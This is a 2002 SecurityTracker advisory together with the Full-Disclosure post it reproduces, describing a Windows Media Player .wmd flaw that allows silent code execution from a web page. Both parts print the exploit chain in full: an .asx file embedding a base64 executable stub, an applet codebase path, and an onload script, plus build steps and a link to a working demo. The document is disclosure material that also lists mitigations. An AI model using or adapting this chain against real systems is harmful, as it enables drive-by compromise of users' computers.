SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Multimedia)  >   Windows Media Player Vendors:   Microsoft
Microsoft Windows Media Player Allows Malicious Windows Media Download (.wmd) Files to Silently Create Files in a Known Location and Execute Them
SecurityTracker Alert ID:  1005108
SecurityTracker URL:  http://securitytracker.com/id/1005108
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 22 2002
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  

Description:   A vulnerability was reported in Windows Media Player. A remote user can create HTML that, when loaded by a target user, will silently install and execute code on the user's system.

According to the report, a recently reported applet codebase vulnerability in Internet Explorer also affects Windows Media Player.

It is reported that a Windows Media Download Package file (.wmd file) will cause Windows Media Player to create a folder with the user-supplied name of the '.wmd' file in the 'Virtual Music' default location. This mechanism can be exploited to extract a file to a known location.

A remote user can create a '.asx' meta file (that embeds a Base64-encoded executable) with the following type of contents:

<ASX version="3">
<Entry>
<ref HREF="cluster.asf"/>
</Entry></ASX>
MIME-Version: 1.0
Content-Location:file:///malware.exe
Content-Transfer-Encoding: base64

TVpEAQUAAgAgACEA//91AAACAACZAAAAPgAAAAEA+zBqcgAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA


<applet CLASSID="CLSID:55555555-5555"
codebase="mhtml:file:///C:\My Documents\My Music\Virtual
Albums\malware\f ck.asx!file:///malware.exe">

The '.asx' file is designed such that Windows Media Player will validate the contents as appearing legitimate and extract the file to a known location.

Then, the remote user can create a '.asf' file that, when loaded, will call the file in the known location. The applet codebase will be executed in the Local Computer zone.

url: cluster.html

<body onload=malware()>
<script>
function malware(){
alert("malware");location=("file://C%3A%5CMy%20Documents%5CMy%20Music%
5CVirtual%20Albums%5Cmalware%5Cf ck.asx%20.")
}
</script>

These two files can be combined in a Windows Media Download package and delivered silently via HTML to the target user.

Impact:   A remote user can cause Windows Media Player to silently download a file to a known location and execute arbitrary code.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/technet/security/ (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] Terrible: Windows Media Player


Wednesday, August 21, 2002

Dear Mister,

'silent delivery and installation of an executable on the target 
computer, no client input other than viewing a web page' default 
installation of Internet Explorer and Windows Media Player.

This is truly terrible. In addition to server side '404 errors', 
cookies and who knows what else [perhaps user.dat, index.dat, even 
the old inbox.mbx], the Windows Media Player appears to be severely 
affected by Jelmer codebase too.

Combing the Jelmer codebase, the Sandblad dot bug and the 1 year old 
wimpy'flication of the media player [see: 
http://www.malware.com/wimpy.html]

1. Create an *.asx meta file as follows: 

<ASX version="3">
<Entry>
<ref HREF="cluster.asf"/>
</Entry></ASX>
MIME-Version: 1.0
Content-Location:file:///malware.exe
Content-Transfer-Encoding: base64

TVpEAQUAAgAgACEA//91AAACAACZAAAAPgAAAAEA+zBqcgAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA


 <applet CLASSID="CLSID:55555555-5555" 
codebase="mhtml:file:///C:\My Documents\My Music\Virtual 
Albums\malware\f ck.asx!file:///malware.exe">

2. Create an *.asf file with URL flip as follows: 

url: cluster.html

<body onload=malware()>
 <script>
function malware(){
alert("malware");location=("file://C%3A%5CMy%20Documents%5CMy%20Music%
5CVirtual%20Albums%5Cmalware%5Cf ck.asx%20.")
 }
  </script>


3. Create a *.wmd file comprising 1 and 2 above. 

What happens? 

Ordinarily the Windows Media Download Package file [*.wmd] creates a 
folder with the given name of the *.wmd file -- e.g. malware.wmd will 
create a folder called malware in the default location for so-
called "Virtual Music" -- specifically: My Documents\My Music\Virtual 
Albums\malware, security measures currently incorporated in the 
extraction of the contents of the *.wmd do a reasonably good job of 
ensuring that files contained within the Download Package, are in 
fact valid files. 

A reasonably good job. 

We find that the bare minimum for the *.asx meta file must include 
the 
following: 

<ASX><Entry><ref HREF=''/></ASX> 

with these tags the Media Player will indeed extract the *.asx file 
into our 
known folder. 

So how do we make use of that? 

Simple: 1,2,3 above, buckle your shoe.

Working Example:

[hard coded for win98, trivial tweaking for others - harmless *.exe]

http://www.malware.com/malware.php

Important Notes:

1. Suggestions have been made that in this particular instance, the 
dot bug is not necessary.
2. Suggestions have been made that the 'open'  "object" hole of 
http://online.securityfocus.com/bid/5196 will work just as well
3. Disable Active Scripting
4. Disable Media Download [if you can]
5. Change the default location of "My Music..."
5. Hopefully this will all be a bad memory once all the patches. 
packs, whatever are finally released.
6. Forget about the 'glitzy' advertising. Think long and hard about 
the products you install

Pathetic Notes:

A.

1. The codebase 'vulnerability' is over 2 years old. Demonstrated in 
a different form and mentioned in its current form in June 2000 
2. Resurrected in fine fashion at the end of 2001 by the Pull with 
many others demonstrating similar thereafter
3. Added to in splendid fashion by Jelmer in July 2002 with key 
protocol


B. The dot bug by Sandblad of May 2002, patched, not patched, fully 
functional to date. With patch and without patch. Not even actually 
required in this instance.

C. The malware *.asx meta file and packable transportable  *.wmd of 
June 2001.

Helpful Notes:

Instead of sitting around trying to thinking up ways that all these 
things cannot work, simply fix it the first time round.  There is no 
such thing as 'mitigating factors' and 'hurdles'. This is a lie. Pure 
fantasy. Fiction. Fix it when you can ! For every way you think it 
cannot be done, there are 10 ways it actually can !

This concludes our summer session and as we are entering junior high 
for the first time in a couple weeks, we need to tinker with our 
bicycles while there is still sunlight.

Trust that clarifies matters for you.

Your friend and mine
http://www.malware.com [MVP - malware]

This posting is provided "AS IS" with no warranties, and confers no 
rights.

Over and Out

-- 
http://www.malware.com






_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC